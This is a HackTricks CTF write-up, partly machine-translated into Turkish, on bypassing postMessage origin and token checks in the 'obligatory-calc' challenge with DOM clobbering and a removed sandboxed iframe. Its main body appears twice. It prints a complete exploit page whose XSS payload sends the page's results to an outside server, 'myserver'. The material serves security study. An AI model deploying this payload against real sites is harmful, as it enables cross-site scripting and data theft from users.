Bypassing SOP with Iframes - 2

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Iframes in SOP-2

In the çözüm for this meydan okuma, @Strellic_ proposes a similar method to the previous section. Let's check it.

In this challenge the attacker needs to bypass this:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Eğer yaparsa, sayfada innerHTML ile yazılacak HTML içeriği ile bir postmessage gönderebilir, bu da sanitasyon olmadan (XSS).

ilk kontrolü atlatmanın yolu window.calc.contentWindow'u undefined ve e.source'u null yapmaktır:

window.calc.contentWindow aslında document.getElementById("calc")'dır. document.getElementById'yi <img name=getElementById /> ile bozabilirsiniz (Sanitizer API -burada- varsayılan durumda DOM clobbering saldırılarına karşı koruma sağlamak için yapılandırılmamıştır).
Bu nedenle, document.getElementById("calc")'yi <img name=getElementById /><div id=calc></div> ile bozabilirsiniz. O zaman, window.calc undefined olacaktır.
Şimdi, e.source'un undefined veya null olması gerekiyor (çünkü == yerine === kullanıldığı için, null == undefined True'dur). Bunu elde etmek "kolaydır". Eğer bir iframe oluşturur ve ondan bir postMessage gönderir ve hemen iframe'i kaldırırsanız, e.origin null olacak. Aşağıdaki kodu kontrol edin.

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

İkinci kontrolü atlatmanın yolu, token değerini null olarak gönderip window.token değerini undefined yapmaktır:

null değeri ile postMessage'de token göndermek basittir.
window.token, document.cookie kullanan getCookie fonksiyonunu çağırırken. null kökenli sayfalarda document.cookie erişiminin bir hata tetikleyeceğini unutmayın. Bu, window.token değerinin undefined olmasına neden olacaktır.

Son çözüm @terjanq tarafından şudur:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'ı takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousBypassing SOP with Iframes - 1 NextSteal postmessage modifying iframe location

Last updated 4 months ago

Iframes in SOP-2

In the çözüm for this meydan okuma, @Strellic_ proposes a similar method to the previous section. Let's check it.

In this challenge the attacker needs to bypass this:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Eğer yaparsa, sayfada innerHTML ile yazılacak HTML içeriği ile bir postmessage gönderebilir, bu da sanitasyon olmadan (XSS).

ilk kontrolü atlatmanın yolu window.calc.contentWindow'u undefined ve e.source'u null yapmaktır:

window.calc.contentWindow aslında document.getElementById("calc")'dır. document.getElementById'yi <img name=getElementById /> ile bozabilirsiniz (Sanitizer API -burada- varsayılan durumda DOM clobbering saldırılarına karşı koruma sağlamak için yapılandırılmamıştır).

Bu nedenle, document.getElementById("calc")'yi <img name=getElementById /><div id=calc></div> ile bozabilirsiniz. O zaman, window.calc undefined olacaktır.

Şimdi, e.source'un undefined veya null olması gerekiyor (çünkü == yerine === kullanıldığı için, null == undefined True'dur). Bunu elde etmek "kolaydır". Eğer bir iframe oluşturur ve ondan bir postMessage gönderir ve hemen iframe'i kaldırırsanız, e.origin null olacak. Aşağıdaki kodu kontrol edin.

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

İkinci kontrolü atlatmanın yolu, token değerini null olarak gönderip window.token değerini undefined yapmaktır:

null değeri ile postMessage'de token göndermek basittir.

window.token, document.cookie kullanan getCookie fonksiyonunu çağırırken. null kökenli sayfalarda document.cookie erişiminin bir hata tetikleyeceğini unutmayın. Bu, window.token değerinin undefined olmasına neden olacaktır.

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>